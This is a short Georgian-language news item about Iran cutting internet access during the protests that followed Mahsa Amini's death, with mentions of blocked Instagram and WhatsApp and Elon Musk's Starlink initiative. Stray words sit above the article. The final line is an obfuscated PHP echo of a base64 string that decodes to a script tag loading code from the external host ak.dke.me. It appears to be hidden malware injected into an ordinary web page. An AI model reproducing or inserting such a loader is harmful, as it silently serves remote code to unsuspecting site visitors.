celsiusi
ავერსი საქკაბელი
ირანში ინტერნეტი გათიშეს - ამის შესახებ ინფორმაციას "მთავარი არხი" ადგილობრივებზე დაყრდნობით ავრცელებს. 
 
მანამდე, 22 სექტემბერს ქვეყანაში Instagram-სა და WhatsApp-ზე წვდომა შეზღუდეს, რაც ბოლო სოციალური ქსელები იყო, რომლებიც ქვეყანაში ფუნქციონირებდა.
 
გარდა ამისა, მაშინ ვრცელდებოდა ინფორმაცია, რომ კავშირი ირანის მობილური ტელეფონის პროვაიდერმაც დაკარგა.
 
ამ ინფორმაციის გასაჯაროების შემდეგ კი SpaceX-ის დამფუძნებელი ილონ მასკი ირანში Starlink-ების გაგზავნის ინიციატივით გამოვიდა. 
 
შეგახსენებთ, რომ ირანში საპროტესტო აქციები ჰიჯაბის ტარების კანონის დარღვევის გამო დაპატიმრებული 22 წლის უფლებადამცველი ქალის, მაჰსა ამინის გარდაცვალებას მოჰყვა. პროტესტი ირანის 20-ზე მეტმა ქალაქმა მოიცვა, ბოლო ინფორმაციით საპროტესტო აქციაზე მინიმუმ 31 ადამიანი დაიღუპა.
 
წყარო: მთავარი არხი
353
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");